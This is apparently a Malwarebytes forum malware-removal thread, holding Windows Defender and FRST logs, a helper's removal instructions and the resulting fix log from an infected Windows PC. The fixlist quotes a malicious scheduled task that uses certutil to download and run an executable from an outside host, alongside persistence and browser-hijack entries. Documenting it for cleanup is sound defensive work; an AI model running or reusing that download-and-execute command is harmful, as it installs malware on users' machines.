Detection Origin: Unknown
Detection Type: Concrete
Detection Source: System
Process Name: C:\Users\Stanley\AppData\Local\Temp\~AceTemp\Invoice890667\log.exe
Action: Quarantine
Action Status:  To finish removing malware and other potentially unwanted software, you need to run a full scan. For information about scanning options, see Help and Support. 
To finish removing malware and other potentially unwanted software, restart the computer. 
Error Code: 0x8007054f
Error description: An internal error occurred. 
Signature Version: AV: 1.267.1085.0, AS: 1.267.1085.0, NIS: 0.0.0.0
Engine Version: AM: 1.1.14800.3, NIS: 0.0.0.0

Date: 2018-05-11 11:10:10.550
Description: 
Windows Defender has encountered a critical error when taking action on malware or other potentially unwanted software.
For more information please see the following:
http://go.microsoft.com/fwlink/?linkid=37020&name=PWS:Win32/Dyzap.X&threatid=2147717189&enterprise=0
Name: PWS:Win32/Dyzap.X
ID: 2147717189
Severity: Severe
Category: Password Stealer
Path: process:_pid:1280,ProcessStart:131703753193678578
Detection Origin: Unknown
Detection Type: Concrete
Detection Source: System
Process Name: C:\Users\Stanley\AppData\Local\Temp\Rar$EXa0.300\RTY_RFQ_GT_USD-FOQ_MoQ.exe
Action: Quarantine
Action Status:  To finish removing malware and other potentially unwanted software, you need to run a full scan. For information about scanning options, see Help and Support. 
To finish removing malware and other potentially unwanted software, restart the computer. 
Error Code: 0x8007054f
Error description: An internal error occurred. 
Signature Version: AV: 1.267.1085.0, AS: 1.267.1085.0, NIS: 0.0.0.0
Engine Version: AM: 1.1.14800.3, NIS: 0.0.0.0

Date: 2018-05-09 14:16:37.521
Description: 
Windows Defender has encountered an error trying to update signatures.
New Signature Version: 
Previous Signature Version: 1.267.831.0
Update Source: Microsoft Update Server
Signature Type: AntiVirus
Update Type: Full
Current Engine Version: 
Previous Engine Version: 1.1.14800.3
Error code: 0x80240016
Error description: An unexpected problem occurred while checking for updates. For information on installing or troubleshooting updates, see Help and Support. 

Date: 2018-05-09 14:16:37.521
Description: 
Windows Defender has encountered an error trying to update signatures.
New Signature Version: 
Previous Signature Version: 1.267.831.0
Update Source: Microsoft Update Server
Signature Type: AntiVirus
Update Type: Full
Current Engine Version: 
Previous Engine Version: 1.1.14800.3
Error code: 0x80240016
Error description: An unexpected problem occurred while checking for updates. For information on installing or troubleshooting updates, see Help and Support. 

CodeIntegrity:
===================================

Date: 2018-12-23 07:19:51.102
Description: 
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\wsadb.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2018-12-23 07:19:49.365
Description: 
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\wsadb.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2018-12-23 07:19:47.582
Description: 
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\wsadb.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2018-12-23 07:19:45.686
Description: 
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\wsadb.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

==================== Memory info =========================== 

Processor: Intel(R) Core(TM) i5-2540M CPU @ 2.60GHz
Percentage of memory in use: 67%
Total physical RAM: 4006.35 MB
Available physical RAM: 1296.44 MB
Total Virtual: 8102.35 MB
Available Virtual: 5425.77 MB

==================== Drives ================================

Drive c: () (Fixed) (Total:297.75 GB) (Free:64.73 GB) NTFS

\\?\Volume{4756afb4-4eee-11e8-824f-806e6f6e6963}\ (System Reserved) (Fixed) (Total:0.34 GB) (Free:0.09 GB) NTFS

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (MBR Code: Windows 7/8/10) (Size: 298.1 GB) (Disk ID: 2DDE751F)
Partition 1: (Active) - (Size=350 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=297.7 GB) - (Type=07 NTFS)

==================== End of Addition.txt ============================


Hello, Welcome to Malwarebytes.
I'm nasdaq and will be helping you.

If you can please print this topic it will make it easier for you to follow the instructions and complete all of the necessary steps in the order listed.
===

Remove these programs in bold via the Control Panel > Programs > Programs and Features.
CloudNet (HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\CloudNet) (Version: 20170301 - EpicNet Inc.) <==== ATTENTION
IncrediMail (HKLM-x32\...\{35505AE1-27E2-4206-B3BF-58771803B8D0}) (Version: 6.6.0.5344 - IncrediMail) Hidden
IncrediMail 2.5 (HKLM-x32\...\IncrediMail) (Version: 6.6.0.5344 - IncrediMail Ltd.)
<<<>>>

Please download the attached Fixlist.txt file to the same folder where the Farbar tool is running from.
The location is listed in the 3rd line of the FRST.txt log you have submitted.

Run FRST and click Fix only once and wait.

The tool will create a log (Fixlog.txt); please post it in your reply.
===

Please post the Fixlog.txt and let me know what problem persists with this computer.

fixlist.txt


OK, thank you.

I just ran the fixlist and I got this log below.

Meanwhile, I still can't open my Chrome browser.

 

Fix result of Farbar Recovery Scan Tool (x64) Version: 13.02.2019
Ran by #Strazzo.RoseGold## (14-02-2019 23:59:05) Run:1
Running from C:\Users\Stanley\Downloads\FRST
Loaded Profiles: #Strazzo.RoseGold## (Available Profiles: #Strazzo.RoseGold## & RoseGold & Administrator)
Boot Mode: Normal
==============================================

fixlist content:
*****************
CreateRestorePoint:
EmptyTemp:
CloseProcesses:
() C:\Windows\windefender.exe
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION
HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\Run: [WitheredHill] => C:\Windows\rss\csrss.exe [4521472 2019-02-08] () <==== ATTENTION
HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\Run: [CloudNet] => C:\Users\Stanley\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe [683008 2019-02-12] (EpicNet Inc.) <==== ATTENTION
HKU\S-1-5-18\...\Policies\Explorer: [NoLowDiskSpaceChecks] 1
CHR HKLM\SOFTWARE\Policies\Google: Restriction <==== ATTENTION
HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\Software\Microsoft\Internet Explorer\Main,Search Page = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBRGNclVS1AC6sNoGt0L7glATSfZxkIT3ysIwavywkdGdDMHHXXnjO9tg0XD9yKBCtOvz1LL_ReIEmCN-xJHRo9pam60eouPPD3a3O4qGVi5Es4iIR24Y7nh9akfPai5Q1OuzbONZLJRZFaqq_kxQ9Z-DCo_GGN5rXIyO8FSvytDaIXTrMcfHrh750Q&q={searchTerms}
HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://%66%65%65%64.%68%65%6C%70%65%72%62%61%72.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBRGNclVS1AC6sNoGt0L7glATSfZxkIT3ysIwavywkdGdDMHHXXnjO9tg0XD9yKBCtOvz1LL_ReIEmCN-xJHRo9pam60eoicpfV_MriSUAQnsKvLWIZ4S1YS7CQyd2I9U6z0Wmnkj5s8T6U3A_ZCShl9ETmnnVUnHlDWcYqc1HesPtQHGIzTqr4X-kp
SearchScopes: HKU\S-1-5-21-1692593245-3285590566-2148222763-1001 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp://yandex.ru/search/?win=331&clid=2100768&text={searchTerms}
SearchScopes: HKU\S-1-5-21-1692593245-3285590566-2148222763-1001 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp://yandex.ru/search/?win=331&clid=2100768&text={searchTerms}
BHO: No Name -> {D5FEC983-01DB-414A-9456-AF95AC9ED7B5} -> No File
BHO-x32: No Name -> {D5FEC983-01DB-414A-9456-AF95AC9ED7B5} -> No File
FF Homepage: Mozilla\Firefox\Profiles\nahd6ha2.default -> file:///C:/ProgramData/Quoteexs/ff.HP
FF NewTab: Mozilla\Firefox\Profiles\nahd6ha2.default -> file:///C:/ProgramData/Quoteexs/ff.NT
CHR Extension: (??????) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\cncgohepihcekklokhbhiblhfcmipbdh [2018-05-04]
CHR Extension: (??????) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\cncgohepihcekklokhbhiblhfcmipbdh [2018-06-07]
CHR Extension: (??????) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 3\Extensions\cncgohepihcekklokhbhiblhfcmipbdh [2018-06-07]
CHR HKLM-x32\...\Chrome\Extension: [cncgohepihcekklokhbhiblhfcmipbdh] - hxxp://clients2.google.com/service/update2/crx
OPR StartupUrls: "hxxp://www.yandex.ru/?win=331&clid=2100767"
OPR Extension: (chrome_filter) - C:\Users\Stanley\AppData\Roaming\Opera Software\Opera Stable\Extensions\iaoamimahmkdnfhcooffilicogppjebo [2019-02-08]
R2 WinDefender; C:\Windows\windefender.exe [0 ] (CreateFileW function failed -> ) <==== ATTENTION (zero byte File/Folder)
R1 2CCD359FD649; C:\Windows\2CCD359FD649.sys [621928 2019-02-08] (????????(??)???? -> VxDriver)
R3 Winmon; C:\Windows\System32\drivers\Winmon.sys [0 ] (WDKTestCert Admin,131480495282941941 -> ) <==== ATTENTION (zero byte File/Folder)
R3 WinmonFS; C:\Windows\System32\drivers\WinmonFS.sys [0 ] (WDKTestCert Admin,131480495282941941 -> Windows (R) Win 7 DDK provider) <==== ATTENTION (zero byte File/Folder)
R1 WinmonProcessMonitor; C:\Windows\System32\drivers\WinmonProcessMonitor.sys [36096 2019-02-12] (WDKTestCert Admin,131666266076831434 -> ) [File not signed]
S3 WinRing0_1_2_0; \??\C:\Users\Stanley\AppData\Local\Temp\7ZipSfx.000\bin\tools\openhardwaremonitor\OpenHardwareMonitor.sys [X] <==== ATTENTION
CustomCLSID: HKU\S-1-5-21-1692593245-3285590566-2148222763-1001_Classes\CLSID\{91A41FCC-BC02-42D8-A36E-0D27FF9BFFC8}\InprocServer32 -> C:\Users\Stanley\AppData\Local\Google\Update\1.3.33.7\psuser_64.dll => No File
Task: {15570572-319C-48BD-AD3A-A7BCC7852BC7} - System32\Tasks\csrss => C:\Windows\rss\csrss.exe () [File not signed] <==== ATTENTION
Task: {3BA5F14D-A722-4A2B-BB6D-E5E747D3F491} - System32\Tasks\UCBrowserUpdater => C:\Program Files (x86)\UCBrowser\Application\update_task.exe <==== ATTENTION
Task: {567829EB-0803-46FA-8139-6EAAC8AC96FA} - System32\Tasks\{E2C35618-CCBE-4D12-A910-891C3DC29DF9} => C:\Windows\system32\pcalua.exe -a "C:\Users\Stanley\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe" -c /uninstall
Task: {C3FE92DB-969F-447D-9F05-1E0093D0326E} - System32\Tasks\ScheduledUpdate => cmd.exe /C certutil.exe -urlcache -split -f hxxp://delaker.info/app/app.exe C:\Users\#Strazzo.RoseGold##\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\#Strazzo.RoseGold##\AppData\Local\Temp\csrss\scheduled.exe /31340 <==== ATTENTION
Task: C:\Windows\Tasks\UCBrowserUpdater.job => C:\Program Files (x86)\UCBrowser\Application\update_task.exe/update!STRAZZOWEEZY\#Strazzo.Ros <==== ATTENTION
ShortcutWithArgument: C:\Users\Stanley\AppData\Local\Microsoft\Windows\Application Shortcuts\Microsoft.InternetExplorer.Default\??????.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> -contentTile -formatVersion 0x00000002 -pinnedTimeLow 0x97d444c2 -pinnedTimeHigh 0x01cd8430 -securityFlags 0x00000000 -url 0x0000002a hxxp://www.yandex.ru/?win=331&clid=2100779
ShortcutWithArgument: C:\Users\Stanley\AppData\Local\Microsoft\Windows\Application Shortcuts\Microsoft.InternetExplorer.Default\??????.?????.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> -contentTile -formatVersion 0x00000002 -pinnedTimeLow 0x97d444c2 -pinnedTimeHigh 0x01cd8430 -securityFlags 0x00000000 -url 0x00000038 hxxp://mail.yandex.ru/?win=331&clid=2100779&from=dist_tl
HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\StartupApproved\Run: => "JKZDOH8VNLX91K7"
HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\StartupApproved\Run: => "4571129"
HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\StartupApproved\Run: => "Q92XOF6FK3X9RHU"
HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\StartupApproved\Run: => "6137198"
HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\StartupApproved\Run: => "1204047"
HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\StartupApproved\Run: => "1214425"
HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\StartupApproved\Run: => "9352489"
HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\StartupApproved\Run: => "9159382"
HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\StartupApproved\Run: => "E054W697C3ZT54X"
HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\StartupApproved\Run: => "19U1RNX4SXNVB7C"
HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\StartupApproved\Run: => "SWPR71H14U5B9RU"
FirewallRules: [{AD0BAEF4-48BF-498A-B8E3-0D1E6B43B2BE}] => (Allow) C:\Program Files (x86)\IncrediMail\Bin\ImpCnt.exe (IncrediMail Inc. -> IncrediMail Ltd.)
FirewallRules: [{57D02F10-F87D-4455-8142-3BD552673374}] => (Allow) C:\Program Files (x86)\IncrediMail\Bin\ImpCnt.exe (IncrediMail Inc. -> IncrediMail Ltd.)
FirewallRules: [{7B7AEBBA-530C-47FF-B21F-41D628410DFC}] => (Allow) C:\Program Files (x86)\IncrediMail\Bin\ImpCnt.exe (IncrediMail Inc. -> IncrediMail Ltd.)
FirewallRules: [{587A092A-9420-4320-9DDC-513DB0956BC2}] => (Allow) C:\Program Files (x86)\IncrediMail\Bin\ImpCnt.exe (IncrediMail Inc. -> IncrediMail Ltd.)
FirewallRules: [{3F8E71DB-3CB9-46B0-9EEC-7E5BBF163810}] => (Allow) C:\Program Files (x86)\IncrediMail\Bin\ImpCnt.exe (IncrediMail Inc. -> IncrediMail Ltd.)
FirewallRules: [{F323F12D-3EEC-4458-B055-FBAD54D42779}] => (Allow) C:\Program Files (x86)\IncrediMail\Bin\ImpCnt.exe (IncrediMail Inc. -> IncrediMail Ltd.)
FirewallRules: [{3F67B498-C298-4567-8384-9D4AE7900D1F}] => (Allow) C:\Program Files (x86)\IncrediMail\Bin\ImpCnt.exe (IncrediMail Inc. -> IncrediMail Ltd.)
FirewallRules: [{39A83BDE-1430-4A5B-8585-D464B7D8D881}] => (Allow) C:\Program Files (x86)\IncrediMail\Bin\ImpCnt.exe (IncrediMail Inc. -> IncrediMail Ltd.)
FirewallRules: [{9965AD37-C5DF-45BB-A1C2-549EA064C54F}] => (Allow) C:\Program Files (x86)\IncrediMail\Bin\ImpCnt.exe (IncrediMail Inc. -> IncrediMail Ltd.)
FirewallRules: [{B8A59D96-BE63-4FC8-A092-04A578AB2D75}] => (Allow) C:\Program Files (x86)\IncrediMail\Bin\ImpCnt.exe (IncrediMail Inc. -> IncrediMail Ltd.)
FirewallRules: [TCP Query User{FCAB66D8-96FF-4F4B-A106-15A490C11107}C:\windows.old\users\hp pc\appdata\local\google\chrome\application\chrome.exe] => (Allow) C:\windows.old\users\hp pc\appdata\local\google\chrome\application\chrome.exe No File
FirewallRules: [UDP Query User{C180034F-D109-4AFE-8F36-F09BB28A0030}C:\windows.old\users\hp pc\appdata\local\google\chrome\application\chrome.exe] => (Allow) C:\windows.old\users\hp pc\appdata\local\google\chrome\application\chrome.exe No File
FirewallRules: [{F03F74C6-9B28-4C5E-807F-CFFCE0C2E487}] => (Block) C:\windows.old\users\hp pc\appdata\local\google\chrome\application\chrome.exe No File
FirewallRules: [{5BAFDC52-58EF-4B5B-A341-46B75F445987}] => (Block) C:\windows.old\users\hp pc\appdata\local\google\chrome\application\chrome.exe No File
FirewallRules: [{D5FA44F3-6E70-484A-B950-51C23F63C442}] => (Allow) C:\Program Files (x86)\AtomPark\Atomic Email Hunter\AtomicEmailHunter.exe No File
FirewallRules: [{798BE548-E73F-4AF0-94AC-9E161FCF481B}] => (Allow) C:\Program Files (x86)\AtomPark\Atomic Email Hunter\AtomicEmailHunter.exe No File
FirewallRules: [{B5F6D4BD-ADF9-4442-A0DC-0243CA6C4944}] => (Allow) C:\Program Files (x86)\Email Extractor 6\Program.exe No File
FirewallRules: [{6B7EAF84-2E3E-4E50-BA29-83BCA3A5D636}] => (Allow) C:\Program Files (x86)\Email Extractor 6\Program.exe No File
FirewallRules: [{53056AED-CF0C-4B77-BE51-E7320F566EF1}] => (Allow) tunmgr.exe No File
FirewallRules: [{99F55921-8B24-4D45-9447-4B1DC03D0F8F}] => (Allow) tunmgr.exe No File
FirewallRules: [{926B5B97-5586-42AD-A783-764467766E9E}] => (Allow) mDNSResponder.exe No File
FirewallRules: [{C1F252D6-9E31-4C1C-92CA-5144E45CBD5F}] => (Allow) mDNSResponder.exe No File
FirewallRules: [{3982D1B5-9BA8-4969-BF52-16243FA460F3}] => (Allow) C:\Program Files\Syncios\pdt_syncios.exe No File
FirewallRules: [{6F63DBCC-4ACC-457F-93AE-3F8F539D5481}] => (Allow) C:\Program Files (x86)\Apowersoft\ApowerManager\ApowerManager.exe No File
FirewallRules: [{38634E52-E26E-4827-B65C-6FD60DEEFCC1}] => (Allow) C:\Program Files (x86)\Apowersoft\ApowerManager\ApowerManager.exe No File
FirewallRules: [{B8B2B85F-89FA-41D1-84C9-AD725179C6CF}] => (Allow) C:\Program Files (x86)\Apowersoft\ApowerManager\ApowerManagerCoreServices.exe No File
FirewallRules: [{68A8AE5E-4C4A-41A3-9B22-62A04FA9BE31}] => (Allow) C:\Program Files (x86)\Apowersoft\ApowerManager\ApowerManagerCoreServices.exe No File
FirewallRules: [{221BFC9C-CC6F-4FE4-B04E-F71FA6660C03}] => (Allow) C:\Windows\rss\csrss.exe ()
FirewallRules: [{2443D1D6-CC7F-4A8D-8467-39EE257F12AF}] => (Allow) C:\Users\#Strazzo.RoseGold##\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe No File
C:\Program Files (x86)\IncrediMail
C:\Users\#Strazzo.RoseGold##\AppData\Local\Temp\csrss
C:\Program Files (x86)\UCBrowser
C:\Windows\System32\drivers\WinmonFS.sys
C:\Windows\System32\drivers\Winmon.sys
C:\Windows\2CCD359FD649.sys
C:\Users\Stanley\AppData\Roaming\EpicNet Inc
C:\Windows\rss\csrss.exe
C:\Windows\windefender.exe
2019-02-12 06:47 - 2019-02-12 06:47 - 000000000 ____D C:\Users\Stanley\AppData\Roaming\EpicNet Inc
2019-02-04 22:34 - 2019-02-05 01:46 - 000000000 ____D () C:\Users\RoseGold\AppData\Local\Temp\syncios.exe
2019-01-30 07:52 - 2019-01-30 07:52 - 000000000 ____D () C:\Users\RoseGold\AppData\Local\Temp\SynciosDeviceService.exe
2019-02-10 23:14 - 2019-02-10 23:14 - 000000000 ____D () C:\Users\Stanley\AppData\Local\Temp\syncios.exe
2019-02-10 23:14 - 2019-02-10 23:14 - 000000000 ____D () C:\Users\Stanley\AppData\Local\Temp\SynciosDeviceService.exe
Reboot:

*****************

Restore point was successfully created.
Processes closed successfully.
C:\Windows\windefender.exe => No running process found
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender => removed successfully
"HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\Software\Microsoft\Windows\CurrentVersion\Run\\WitheredHill" => not found
"HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\Software\Microsoft\Windows\CurrentVersion\Run\\CloudNet" => not found
"HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\\NoLowDiskSpaceChecks" => removed successfully
HKLM\SOFTWARE\Policies\Google => removed successfully
HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\Software\Microsoft\Internet Explorer\Main\\Search Page => value restored successfully
HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\Software\Microsoft\Internet Explorer\Main\\Start Page => value restored successfully
"HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\DefaultScope" => removed successfully
HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A} => removed successfully
HKLM\Software\Classes\CLSID\{0633EE93-D776-472f-A0FF-E1416B8B2E3A} => not found
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{D5FEC983-01DB-414A-9456-AF95AC9ED7B5} => removed successfully
HKLM\Software\Classes\CLSID\{D5FEC983-01DB-414A-9456-AF95AC9ED7B5} => not found
HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{D5FEC983-01DB-414A-9456-AF95AC9ED7B5} => removed successfully
HKLM\Software\Wow6432Node\Classes\CLSID\{D5FEC983-01DB-414A-9456-AF95AC9ED7B5} => not found
"Firefox homepage" => removed successfully
"Firefox newtab" => removed successfully
CHR Extension: (??????) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\cncgohepihcekklokhbhiblhfcmipbdh [2018-05-04] => Error: No automatic fix found for this entry.
CHR Extension: (??????) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\cncgohepihcekklokhbhiblhfcmipbdh [2018-06-07] => Error: No automatic fix found for this entry.
CHR Extension: (??????) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 3\Extensions\cncgohepihcekklokhbhiblhfcmipbdh [2018-06-07] => Error: No automatic fix found for this entry.
HKLM\SOFTWARE\Wow6432Node\Google\Chrome\Extensions\cncgohepihcekklokhbhiblhfcmipbdh => removed successfully
"OPR StartupUrls: "hxxp://www.yandex.ru/?win=331&clid=2100767"" => removed successfully
C:\Users\Stanley\AppData\Roaming\Opera Software\Opera Stable\Extensions\iaoamimahmkdnfhcooffilicogppjebo => moved successfully
WinDefender => service not found.
2CCD359FD649 => Unable to stop service.
HKLM\System\CurrentControlSet\Services\2CCD359FD649 => removed successfully
2CCD359FD649 => service removed successfully
HKLM\System\CurrentControlSet\Services\Winmon => removed successfully
Winmon => service removed successfully
HKLM\System\CurrentControlSet\Services\WinmonFS => removed successfully
WinmonFS => service removed successfully
HKLM\System\CurrentControlSet\Services\WinmonProcessMonitor => removed successfully
WinmonProcessMonitor => service removed successfully
HKLM\System\CurrentControlSet\Services\WinRing0_1_2_0 => removed successfully
WinRing0_1_2_0 => service removed successfully
HKU\S-1-5-21-1692593245-3285590566-2148222763-1001_Classes\CLSID\{91A41FCC-BC02-42D8-A36E-0D27FF9BFFC8} => removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{15570572-319C-48BD-AD3A-A7BCC7852BC7}" => not found
"C:\Windows\System32\Tasks\csrss" => not found
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\csrss" => not found
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{3BA5F14D-A722-4A2B-BB6D-E5E747D3F491}" => removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{3BA5F14D-A722-4A2B-BB6D-E5E747D3F491}" => removed successfully
C:\Windows\System32\Tasks\UCBrowserUpdater => moved successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\UCBrowserUpdater" => removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{567829EB-0803-46FA-8139-6EAAC8AC96FA}" => removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{567829EB-0803-46FA-8139-6EAAC8AC96FA}" => removed successfully
C:\Windows\System32\Tasks\{E2C35618-CCBE-4D12-A910-891C3DC29DF9} => moved successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{E2C35618-CCBE-4D12-A910-891C3DC29DF9}" => removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{C3FE92DB-969F-447D-9F05-1E0093D0326E}" => not found
"C:\Windows\System32\Tasks\ScheduledUpdate" => not found
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\ScheduledUpdate" => not found
C:\Windows\Tasks\UCBrowserUpdater.job => moved successfully
C:\Users\Stanley\AppData\Local\Microsoft\Windows\Application Shortcuts\Microsoft.InternetExplorer.Default\??????.lnk => Could not remove or repair shortcut argument. The shortcut could be damaged.
C:\Users\Stanley\AppData\Local\Microsoft\Windows\Application Shortcuts\Microsoft.InternetExplorer.Default\??????.?????.lnk => Could not remove or repair shortcut argument. The shortcut could be damaged.
"HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run\\JKZDOH8VNLX91K7" => removed successfully
"HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\\JKZDOH8VNLX91K7" => not found
"HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run\\4571129" => removed successfully
"HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\\4571129" => not found
"HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run\\Q92XOF6FK3X9RHU" => removed successfully
"HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\\Q92XOF6FK3X9RHU" => not found
"HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run\\6137198" => removed successfully
"HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\\6137198" => not found
"HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run\\1204047" => removed successfully
"HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\\1204047" => not found
"HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run\\1214425" => removed successfully
"HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\\1214425" => not found
"HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run\\9352489" => removed successfully
"HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\\9352489" => not found
"HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run\\9159382" => removed successfully
"HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\\9159382" => not found
"HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run\\E054W697C3ZT54X" => removed successfully
"HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\\E054W697C3ZT54X" => not found
"HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run\\19U1RNX4SXNVB7C" => removed successfully
"HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\\19U1RNX4SXNVB7C" => not found
"HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run\\SWPR71H14U5B9RU" => removed successfully
"HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\\SWPR71H14U5B9RU" => not found
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{AD0BAEF4-48BF-498A-B8E3-0D1E6B43B2BE}" => not found
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{57D02F10-F87D-4455-8142-3BD552673374}" => not found
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{7B7AEBBA-530C-47FF-B21F-41D628410DFC}" => not found
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{587A092A-9420-4320-9DDC-513DB0956BC2}" => not found
